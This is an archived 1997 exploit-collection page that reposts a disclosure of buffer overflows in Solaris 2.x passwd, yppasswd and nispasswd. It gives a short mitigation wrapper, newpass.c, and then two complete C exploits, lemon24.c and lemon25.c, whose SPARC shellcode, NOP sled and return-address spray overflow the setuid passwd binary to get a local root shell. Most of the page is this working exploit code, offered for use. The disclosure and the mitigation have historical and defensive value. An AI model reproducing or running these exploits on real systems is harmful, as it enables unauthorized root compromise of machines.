Overflow in solaris passwd (and yppasswd and nispasswd)

Summary

Description:	Standard overflows
Author:	Cristian SCHIPOR (skipo@SUNDY.CS.PUB.RO)
Compromise:	root (local)
Vulnerable Systems:	Solaris 2.X, including 2.4 and 2.5
Date:	12 July 1997
Notes:	I somehow missed this in my collection, thanks to the fellow (who wishes to be anonymous) who reminded me of this beauty!

Details

BIG Security Hole in Solaris 2.X (X)passwd + exploit

Cristian SCHIPOR (skipo@SUNDY.CS.PUB.RO)
Tue, 25 Feb 1997 17:11:38 +0200 


Tue Feb 25 14:22 EET 1997 Romania

 " Another letter - another bug "

An Exploit for a Big Big security hole in passwd ( + yppasswd and
nispasswd)

Under Solaris 2.X passwd, yppasswd and nispasswd can be overflowed in
an internal function ( some like sa_chauthtok() ). Using a buffer
overflow exploit anyone can gain root access (passwd need suid exec bit
from root). passwd has a second  overflow bug  when it is called with
'-s' option in an internal strcpy().

I written two exploits one for Solaris 2.4 and one for Solaris 2.5 for
sa_chauthtok() type function ( passwd LEMON_BUFFER ). It's a little trick
here - the LEMON_BUFFER is shifted in memory with 1 char after exec so it
must to shift the LEMON_BUFFER in a reverse direction before exec -
that's happening only for a special combination of the exec args -
see my exploits.

A way to prevent the exploit is to rename passwd, nispasswd and yppasswd
and get out suid-exec bit. After that you have to compile a little
program ( some like newpass.c ) with name passwd or nispasswd or yppasswd
like root and  give them suid-exec bit. You have to change the
"hidden_passwd"
constant with the new name of Xpasswd files.

Cristian Schipor - Computer Science Faculty - Bucharest - Romania

E-mail: skipo@math.pub.ro , skipo@sundy.cs.pub.ro , skipo@ns.ima.ro
Phone: (401) - 410.60.88

---------------------------- file newpass.c
-------------------------------
#include <stdio.h>
#include <syslog.h>

#define hidden_passwd "/bin/hpasswd" /*change here ...*/
#define MAX_LENGTH 32

void main(int argc, char *argv[])
{
int i;
char *args[10];

        if(argc < 10)
        {
                args[0]=hidden_passwd;
                for(i = 1; i<argc; i++)
                {
                        if(strlen(argv[i]) > MAX_LENGTH)
                        {
                                printf("You reached the maximum length in
args\n");
                                exit(0);
                        }
                        else args[i]=argv[i];
                }
                args[i]=(char *)0;
                execv(args[0],args);
        }
        else
        {
                printf("You reached the maximum number of args !\n");
        }
}

---------------------------- end newpass.c
-----------------------------------

------------------------------ EXPLOITS ----------------------------------

------------------------------ lemon24.c --------------------------------
/*
Exploit for Solaris 2.4 ( it is a little and subtile different  beetwen
this
exploit and the prog for Solaris 2.5 - the overflow buffer is shifted
with 1 char )
With argv[1] you can modify the stack_offset (+-256).
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH      600
#define EXTRA           600
#define STACK_OFFSET    1400
#define SPARC_NOP       0xa61cc013

u_char sparc_shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;

u_long get_sp(void)
{
  __asm__("mov %sp,%i0 \n");
}

void main(int argc, char *argv[])
{
  char buf[BUF_LENGTH + EXTRA + 8];
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen(sparc_shellcode),dso=0;

  if(argc > 1) dso=atoi(argv[1]);

  long_p =(u_long *)  buf ;
    targ_addr = get_sp() - STACK_OFFSET - dso;

  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  char_p = (u_char *) long_p;

  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  long_p = (u_long *) char_p;


  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ =targ_addr;

  printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
  targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
  execl("/bin/passwd", "passwd", & buf[1],(char *) 0);
  perror("execl failed");
}

-------------------------------- end of lemon24.c
----------------------------

---------------------------------- lemon25.c
--------------------------------

/*
This is for Solaris 2.5.(1) !
With argv[1] you can modify the stack offset (+-500) if you have troubles
...
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH      1100
#define EXTRA           1200
#define STACK_OFFSET    3800
#define SPARC_NOP       0xa61cc013

u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff"
;

u_long get_sp(void)
{
  __asm__("mov %sp,%i0 \n");
}

void main(int argc, char *argv[])
{
  char buf[BUF_LENGTH + EXTRA];
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen(sparc_shellcode),dso=0;

  if(argc > 1) dso=atoi(argv[1]);

  long_p =(u_long *)  buf;
    targ_addr = get_sp() - STACK_OFFSET - dso;

  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  char_p = (u_char *) long_p;

  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  long_p = (u_long *) char_p;


  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ =targ_addr;

  printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
  targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
  execl("/bin/passwd", "passwd", buf,(char *) 0);
  perror("execl failed");
}

----------------------------------- end of lemon25.c
-------------------------


 # End
--
Fyodor                                                       fyodor@nmap.org
Visit exploit world:                             http://www.dhp.com/~fyodor
"Now most of these are techniques for use by experts only ... my first line
of defense is to use several on-line services. That way whenever one account
is getting hacked, bombed, etc., I can just email all my correspondents and
tell them where to reach me.  --Carolyn Meinel GTmHH 3.1

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: